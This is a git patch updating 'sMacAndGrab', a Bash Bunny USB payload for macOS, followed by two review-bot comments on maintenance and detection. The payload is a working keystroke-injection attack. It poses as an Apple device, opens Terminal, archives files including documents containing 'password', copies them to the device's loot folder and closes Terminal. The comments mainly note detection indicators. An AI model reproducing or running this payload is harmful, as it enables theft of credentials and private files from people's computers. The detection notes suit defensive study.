From ca9e53c5a8d053eaa7ab144cd447f50eb89f93c7 Mon Sep 17 00:00:00 2001
From: Alex Flores
Date: Wed, 26 Apr 2017 17:04:38 -1000
Subject: [PATCH] updates sMacAndGrab for bashbunny fw1.1 (#202)
---
 .../library/exfiltration/SmacAndGrab/payload.txt | 13 ++++---------
 payloads/library/exfiltration/SmacAndGrab/readme.md | 2 +-
 2 files changed, 5 insertions(+), 10 deletions(-)
diff --git a/payloads/library/exfiltration/SmacAndGrab/payload.txt b/payloads/library/exfiltration/SmacAndGrab/payload.txt
index 8ac0da0e..a78f1fc5 100644
--- a/payloads/library/exfiltration/SmacAndGrab/payload.txt
+++ b/payloads/library/exfiltration/SmacAndGrab/payload.txt
@@ -3,14 +3,14 @@
 # Title: sMacAndGrab
 # Author: audibleblink
 # Target: macOS
-# Version: 1.1
+# Version: 1.2
 #
 # Backup a list of files from macOS
 #
 # Yellow (blinking)...Attacking
 # Green...............Finished
-LED G R 500
+LED ATTACK
 ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
 # make the loot directory on the BashBunny
@@ -50,16 +50,11 @@ files_to_copy=(
 "\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET
 )
-QUACK GUI SPACE
-QUACK DELAY 1000
-QUACK STRING terminal
-QUACK ENTER
+QUACK RUN OSX terminal
 QUACK DELAY 4000
 # the more files in $files to copy, the longer tar will take to compress
 # one-liner because we want the move command to wait for tar to finish
 QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal
 QUACK ENTER
-# sync the filesystem
-sync
-LED G
+LED FINISH
diff --git a/payloads/library/exfiltration/SmacAndGrab/readme.md b/payloads/library/exfiltration/SmacAndGrab/readme.md
index 181d8d7b..2a9714ee 100644
--- a/payloads/library/exfiltration/SmacAndGrab/readme.md
+++ b/payloads/library/exfiltration/SmacAndGrab/readme.md
@@ -1,7 +1,7 @@
 # sMacAndGrab
 Author: audibleblink
-Version: Version 1.1
+Version: Version 1.2
 Target: macOS
 ## Description
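Review bot: In payload.txt's first hunk (`@@ -3,14 +3,14 @@`) the header goes to `# Version: 1.2` and the script starts using `LED ATTACK`, but the header block never states the firmware it now depends on; only the commit subject mentions fw1.1. I would add a line such as `# Requires: Bash Bunny firmware 1.1 or later` under `# Version: 1.2`, and re-check the legend lines `# Yellow (blinking)...Attacking` / `# Green...............Finished` against what the named LED states display, since they were written for the old `LED G R 500` call. For readers using this page as a detection reference, the unchanged `ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E` line is the stable indicator: the device enumerates as keyboard plus mass storage while claiming an Apple vendor ID, so USB device-control policy that keys on unexpected composite HID/storage devices still applies after this change.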
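Review bot: In payload.txt's second hunk (`@@ -50,16 +50,11 @@`) the `# sync the filesystem` / `sync` lines are dropped with no reason given in the commit message or in a comment, so a maintainer cannot tell whether firmware 1.1 makes the flush redundant or it was removed by accident; a one-line comment above `LED FINISH` stating the reason would settle that. `LED FINISH` also follows the last `QUACK ENTER` directly, so it marks the end of keystroke injection rather than completion of the typed command on the host, which the header legend `Finished` does not say. The `files_to_copy=(` array opens outside this hunk. On the host side nothing changes for defenders: Terminal is launched by injected keystrokes (now through `QUACK RUN OSX terminal`), runs `tar` over the listed paths, moves the archive to `$lootdir` and ends with `killall Terminal`, a short-lived process chain that endpoint process telemetry and removable-media restrictions are positioned to catch.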